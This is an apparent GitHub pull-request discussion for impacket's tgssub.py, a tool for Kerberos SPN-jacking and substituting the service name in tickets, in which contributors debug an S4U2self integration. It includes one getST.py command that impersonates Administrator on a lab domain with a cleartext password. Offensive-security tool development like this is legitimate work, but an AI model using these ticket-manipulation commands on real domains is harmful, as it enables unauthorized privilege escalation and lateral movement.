impacket
impacket copied to clipboard
fortra
[tgssub.py] New example script: adding tgssub for SPN-jacking and manual sname manipulation
Example script to allow for SPN-jacking and manual manipulation of tickets to edit the sname (i.e. SPN) the ticket is issued for.
Python equivalent to Rubeus tgssub command (https://github.com/GhostPack/Rubeus#tgssub)
This can be done because the service name is not in the encrypted part of the ticket (cf. Wagging the Dog).
This is already done in Impacket internals with the AnySPN technique but now, attackers can use this standalone script, along with describeTicket.py from #1201 to manipulate (Rubeus tgssub) and inspect tickets (Rubeus describe) manually.
References
- https://www.thehacker.recipes/ad/movement/kerberos/spn-jacking
- https://www.semperis.com/blog/spn-jacking-an-edge-case-in-writespn-abuse/
- https://www.secureauth.com/blog/kerberos-delegation-spns-and-more/
#1202 now handles -altservice, allowing for mirroring of Rubeus's ability to do so. Service substitution can then be conducted either separately with this standalone tool, or with getST's new feature brought in https://github.com/SecureAuthCorp/impacket/pull/1202/commits/bdf6c0e9096912845c8e998f4f431b2b631e6ac1
there is some problem when I integrate this PR to getST the ticket it generated can not be used when the source ticket is returned by s4u2self
and you will get error here
because ticket reutrned by s4u2self have no service class, so there is no '/'
and you will get error here
because ticket reutrned by s4u2self have no service class, so there is no '/'
Can you use GitHub's review feature, or indicate lines where you think there are errors?
there is some problem when I integrate this PR to getST the ticket it generated can not be used when the source ticket is returned by s4u2self
Can you give more details (debug print, screenshot) of what you're trying to do?
and you will get error here
Can you use GitHub's review feature, or indicate lines where you think there are errors?
If you're referring to https://github.com/SecureAuthCorp/impacket/pull/1256/files#diff-6282295c24020ba24be7e2a8a1133327088ab06cd43bded706a193ec283ea1e7R49, as you can see this line is in an "if/else" statement checking the presence of "/" in the original ticket's sname. Have you even tried before pointing this out?
there is some problem when I integrate this PR to getST the ticket it generated can not be used when the source ticket is returned by s4u2self
Can you give more details (debug print, screenshot) of what you're trying to do?
I do s4u2self with this RP, and here is the command I use:
getST.py mother.fucker/test$:qwe123... -impersonate Administrator -dc-ip 192.168.56.145 -self -altservice CIFS/WIN-PADVTVG8OT8.mother.fucker -debug
here is the result:
seem like all is good, but when I use pass this ticket to smbclient, I got this:
and you will get error here
Can you use GitHub's review feature, or indicate lines where you think there are errors?
If you're referring to https://github.com/SecureAuthCorp/impacket/pull/1256/files#diff-6282295c24020ba24be7e2a8a1133327088ab06cd43bded706a193ec283ea1e7R49, as you can see this line is in an "if/else" statement checking the presence of "/" in the original ticket's sname. Have you even tried before pointing this out?
sorry, maybe I changed your code by accident
and you will get error here
Can you use GitHub's review feature, or indicate lines where you think there are errors?
If you're referring to https://github.com/SecureAuthCorp/impacket/pull/1256/files#diff-6282295c24020ba24be7e2a8a1133327088ab06cd43bded706a193ec283ea1e7R49, as you can see this line is in an "if/else" statement checking the presence of "/" in the original ticket's sname. Have you even tried before pointing this out?
turns out my code of your tgssub.py is outdated
Worked with @wqreytuk, this feature needs further testing, but it now works on our end. The substitution wasn't complete. The information in the ticket wasn't replaced. Only the information in the credential object was. This is now fixed.